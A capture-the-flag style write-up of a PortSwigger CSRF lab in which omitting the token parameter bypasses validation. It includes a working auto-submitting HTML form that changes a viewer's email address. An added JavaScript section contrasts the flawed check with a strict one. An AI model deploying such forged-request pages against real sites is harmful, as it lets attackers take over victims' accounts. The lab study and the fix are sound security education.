# Lab: CSRF where token validation depends on token being present

###### tags: `Portswigger Web Security Academy` `Web`

* Description: This lab's email change functionality is vulnerable to CSRF.
* Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address. You can log in to your own account using the following credentials: `wiener:peter`

## Recon

1. Log in and update the email address to capture the request.
   It is very similar to the previous lab: the request carries a `CSRF_token` parameter.
   ![](https://i.imgur.com/69FaW1R.png)
2. Try the first bypass method.
   ![](https://i.imgur.com/Mm1YvZ5.png)
   It seems to work properly.

## Exp - Delete `CSRF_token` directly to bypass

Actually, this is exactly the same as the first lab's payload.

Exploit Payload:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://0aa70059042bf55d80101c7a00930051.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="danger&#64;gmail&#46;com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

:::spoiler Success Screenshot
![](https://i.imgur.com/EN6dFEO.png)
:::

## Reference

* [Lab: CSRF where token validation depends on token being present: CSRF](https://blog.csdn.net/ZripenYe/article/details/120793710)
* [Mastering CSRF completely, from 0 to 1](https://zhuanlan.zhihu.com/p/517735618)
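
The server-side flaw behind this lab, next to a corrected check, as an added example (not code from the lab or from PortSwigger). The function names, the session object and the sample requests are hypothetical and constructed for illustration; only the `CSRF_token` parameter name comes from the write-up.

```javascript
// Flawed: the token is compared only when the parameter exists, so a
// request that omits CSRF_token entirely skips validation and is accepted.
function validateIfPresent(session, body) {
  if (body.CSRF_token === undefined) return true; // the flaw
  return body.CSRF_token === session.csrfToken;
}

// Length check plus XOR accumulation, so a mismatch does not return early.
// (In Node.js, crypto.timingSafeEqual on Buffers is the library equivalent.)
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Corrected: a missing, empty or non-string token is a failure, not a pass.
function validateStrict(session, body) {
  const sent = body.CSRF_token;
  const expected = session.csrfToken;
  if (typeof sent !== 'string' || sent.length === 0) return false;
  if (typeof expected !== 'string' || expected.length === 0) return false;
  return constantTimeEqual(sent, expected);
}

// Constructed sample data: one session and three email-change requests.
const session = { csrfToken: 'c0ffee00c0ffee00c0ffee00c0ffee00' };
const requests = {
  legitimate: { email: 'user@example.com', CSRF_token: session.csrfToken },
  wrongToken: { email: 'user@example.com', CSRF_token: '0'.repeat(32) },
  tokenOmitted: { email: 'user@example.com' }, // parameter removed
};

// Run every sample request through both validators.
function compare() {
  const out = {};
  for (const [name, body] of Object.entries(requests)) {
    out[name] = {
      flawed: validateIfPresent(session, body),
      strict: validateStrict(session, body),
    };
  }
  return out;
}

console.table(compare());
```

Only the `tokenOmitted` row differs between the two columns, which is why testing a token check with a wrong value alone does not reveal this bug.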